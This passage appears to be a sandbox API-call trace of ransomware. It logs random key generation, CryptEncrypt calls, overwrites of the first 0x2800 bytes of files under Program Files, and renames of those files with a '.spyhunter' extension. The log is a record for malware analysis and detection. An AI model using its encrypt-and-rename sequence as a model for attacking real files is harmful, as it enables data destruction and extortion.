pbBuffer=0x270f5b8 | out: pbBuffer=0x270f5b8) returned 1 [0121.235] GetProcessHeap () returned 0x2c0000 [0121.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0121.235] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5b0*=0x30) returned 1 [0121.235] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\reminder-marriott-divisions.exe" (normalized: "c:\\program files (x86)\\adobe\\reminder-marriott-divisions.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.235] GetProcessHeap () returned 0x2c0000 [0121.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0121.235] GetProcessHeap () returned 0x2c0000 [0121.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03268 | out: hHeap=0x2c0000) returned 1 [0121.237] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5b0 | out: pbBuffer=0x270f5b0) returned 1 [0121.237] GetProcessHeap () returned 0x2c0000 [0121.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0121.237] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5a8*=0x30) returned 1 [0121.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0121.239] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm") returned 56 [0121.239] StrStrW (lpFirst="Viktigt.htm", lpSrch=".txt") returned 0x0 [0121.239] GetProcessHeap () returned 0x2c0000 [0121.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0121.239] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f56c*=0x2800, lpOverlapped=0x0) returned 1 [0122.530] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0122.530] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f56c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f56c*=0x2800, lpOverlapped=0x0) returned 1 [0122.531] GetProcessHeap () returned 0x2c0000 [0122.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0122.531] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.531] WriteFile (in: hFile=0x16c, lpBuffer=0x270f5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f56c, lpOverlapped=0x0 | out: lpBuffer=0x270f5ac*, lpNumberOfBytesWritten=0x270f56c*=0x4, lpOverlapped=0x0) returned 1 [0122.533] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f56c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f56c*=0x30, lpOverlapped=0x0) returned 1 [0122.534] CloseHandle (hObject=0x16c) returned 1 [0122.534] GetProcessHeap () returned 0x2c0000 [0122.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0122.534] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.spyhunter") returned 66 [0122.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktigt.htm.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktigt.htm.spyhunter")) returned 1 [0122.535] GetProcessHeap () returned 0x2c0000 [0122.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0122.535] GetProcessHeap () returned 0x2c0000 [0122.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.535] GetProcessHeap () returned 0x2c0000 [0122.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f280 | out: hHeap=0x2c0000) returned 1 [0122.536] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5a8 | out: pbBuffer=0x270f5a8) returned 1 [0122.536] GetProcessHeap () returned 0x2c0000 [0122.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.536] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5a0*=0x30) returned 1 [0122.537] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msjro.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msjro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.537] GetProcessHeap () returned 0x2c0000 [0122.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.538] GetProcessHeap () returned 0x2c0000 [0122.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfec0 | out: hHeap=0x2c0000) returned 1 [0122.538] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5a0 | out: pbBuffer=0x270f5a0) returned 1 [0122.538] GetProcessHeap () returned 0x2c0000 [0122.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.538] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f598*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f598*=0x30) returned 1 [0122.538] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadrh15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.538] GetProcessHeap () returned 0x2c0000 [0122.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.538] GetProcessHeap () returned 0x2c0000 [0122.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfdf8 | out: hHeap=0x2c0000) returned 1 [0122.538] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5a0 | out: pbBuffer=0x270f5a0) returned 1 [0122.538] GetProcessHeap () returned 0x2c0000 [0122.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.539] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f598*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f598*=0x30) returned 1 [0122.539] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.541] GetProcessHeap () returned 0x2c0000 [0122.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.541] GetProcessHeap () returned 0x2c0000 [0122.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfd30 | out: hHeap=0x2c0000) returned 1 [0122.541] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f598 | out: pbBuffer=0x270f598) returned 1 [0122.541] GetProcessHeap () returned 0x2c0000 [0122.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f590*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f590*=0x30) returned 1 [0122.541] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msador15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msador15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfba0 | out: hHeap=0x2c0000) returned 1 [0122.542] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f598 | out: pbBuffer=0x270f598) returned 1 [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.542] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f590*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f590*=0x30) returned 1 [0122.542] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e034d8 | out: hHeap=0x2c0000) returned 1 [0122.542] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f590 | out: pbBuffer=0x270f590) returned 1 [0122.542] GetProcessHeap () returned 0x2c0000 [0122.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.543] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f588*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f588*=0x30) returned 1 [0122.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msadomd.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msadomd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.547] GetProcessHeap () returned 0x2c0000 [0122.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.547] GetProcessHeap () returned 0x2c0000 [0122.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfad8 | out: hHeap=0x2c0000) returned 1 [0122.549] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f588 | out: pbBuffer=0x270f588) returned 1 [0122.549] GetProcessHeap () returned 0x2c0000 [0122.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.549] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f580*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f580*=0x30) returned 1 [0122.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.554] GetProcessHeap () returned 0x2c0000 [0122.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.554] GetProcessHeap () returned 0x2c0000 [0122.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03c28 | out: hHeap=0x2c0000) returned 1 [0122.554] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f588 | out: pbBuffer=0x270f588) returned 1 [0122.554] GetProcessHeap () returned 0x2c0000 [0122.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f580*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f580*=0x30) returned 1 [0122.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.555] GetProcessHeap () returned 0x2c0000 [0122.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.555] GetProcessHeap () returned 0x2c0000 [0122.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e038e8 | out: hHeap=0x2c0000) returned 1 [0122.556] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f580 | out: pbBuffer=0x270f580) returned 1 [0122.556] GetProcessHeap () returned 0x2c0000 [0122.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.556] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f578*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f578*=0x30) returned 1 [0122.556] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.561] GetProcessHeap () returned 0x2c0000 [0122.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.561] GetProcessHeap () returned 0x2c0000 [0122.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0122.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f580 | out: pbBuffer=0x270f580) returned 1 [0122.561] GetProcessHeap () returned 0x2c0000 [0122.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f578*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f578*=0x30) returned 1 [0122.561] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.561] GetProcessHeap () returned 0x2c0000 [0122.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.561] GetProcessHeap () returned 0x2c0000 [0122.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03748 | out: hHeap=0x2c0000) returned 1 [0122.562] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f578 | out: pbBuffer=0x270f578) returned 1 [0122.562] GetProcessHeap () returned 0x2c0000 [0122.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.562] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f570*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f570*=0x30) returned 1 [0122.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.562] GetProcessHeap () returned 0x2c0000 [0122.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.562] GetProcessHeap () returned 0x2c0000 [0122.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfdf8 | out: hHeap=0x2c0000) returned 1 [0122.562] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f578 | out: pbBuffer=0x270f578) returned 1 [0122.562] GetProcessHeap () returned 0x2c0000 [0122.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.562] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f570*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f570*=0x30) returned 1 [0122.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0122.570] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f570 | out: pbBuffer=0x270f570) returned 1 [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.570] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f568*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f568*=0x30) returned 1 [0122.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03678 | out: hHeap=0x2c0000) returned 1 [0122.570] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f570 | out: pbBuffer=0x270f570) returned 1 [0122.570] GetProcessHeap () returned 0x2c0000 [0122.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.570] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f568*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f568*=0x30) returned 1 [0122.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfba0 | out: hHeap=0x2c0000) returned 1 [0122.571] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f568 | out: pbBuffer=0x270f568) returned 1 [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f560*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f560*=0x30) returned 1 [0122.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handsafe.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e035a8 | out: hHeap=0x2c0000) returned 1 [0122.571] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f568 | out: pbBuffer=0x270f568) returned 1 [0122.571] GetProcessHeap () returned 0x2c0000 [0122.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f560*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f560*=0x30) returned 1 [0122.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\handler.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.572] GetProcessHeap () returned 0x2c0000 [0122.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.572] GetProcessHeap () returned 0x2c0000 [0122.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e034d8 | out: hHeap=0x2c0000) returned 1 [0122.573] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f560 | out: pbBuffer=0x270f560) returned 1 [0122.573] GetProcessHeap () returned 0x2c0000 [0122.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.573] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f558*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f558*=0x30) returned 1 [0122.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0122.594] GetProcessHeap () returned 0x2c0000 [0122.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0122.594] GetProcessHeap () returned 0x2c0000 [0122.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4c50 | out: hHeap=0x2c0000) returned 1 [0122.594] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f558 | out: pbBuffer=0x270f558) returned 1 [0122.594] GetProcessHeap () returned 0x2c0000 [0122.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0122.594] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f550*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f550*=0x30) returned 1 [0122.594] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\xmlrw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.595] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\xmlrw.dll") returned 63 [0122.595] StrStrW (lpFirst="xmlrw.dll", lpSrch=".txt") returned 0x0 [0122.595] GetProcessHeap () returned 0x2c0000 [0122.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0122.595] ReadFile (in: hFile=0x120, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, 